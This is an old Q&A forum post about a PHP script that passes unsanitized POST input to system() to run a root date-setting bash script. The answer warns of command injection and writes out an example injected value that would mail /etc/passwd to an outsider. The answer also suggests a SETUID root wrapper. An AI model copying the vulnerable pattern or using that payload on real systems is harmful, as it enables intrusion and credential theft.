Aug 21, 2011
tom

running a bash script as root to change the date, when called by a php script

Question

I need to change the server date by running a bash script called by php. When i invoke the bash script from shell it works, but if i call it via php then it doesn’t work. The bash script is run as root.

php script code:

<?php
$time = $_POST['input_time'];$command = "/home/tutul/bin/timetest.sh";$output=system("$command $time");
echo "$output";
?>

bash script code:

#! /bin/sh
date $1
hwclock --systohc --utc

What am i doing wrong here?

I tried to run it on my local machine when logged in as root, so i guess the script is invoked as root?

Answer

First, I assume you realize that PHP script is susceptible to command injection, yes? For example, if I POST to the script with “input_time=whocares%3Bmail+me%40gmail.com+%3C+%2Fetc%2Fpasswd” I could expect a nice password file in my inbox.

Second, setting the system time requires root privileges. If you were calling a binary executable, you could make it SETUID (chmod u+s $program; chown root $program). Fortunately, Linux does not respect the SETUID bit on scripts. If you are absolutely set on this technique, one fix is to write a C wrapper to call your script as root. The wrapper would be SETUID root and would call your script.
If you do this, please be sure to sanitize the input before passing it off to your script!

EDIT:

http://stackoverflow.com/questions/556194/calling-a-script-from-a-setuid-root-c-program-script-does-not-run-as-root

Related posts:

  1. bash script to execute php file
  2. How to break from infinite loop, caused by PHP script running as root?
  3. Bash script normal user to Root
  4. Need help with executing and deleting remote bash script via a local bash script
  5. How to set a timeout within a BASH script for a process that sometimes becomes inactive?

Leave a comment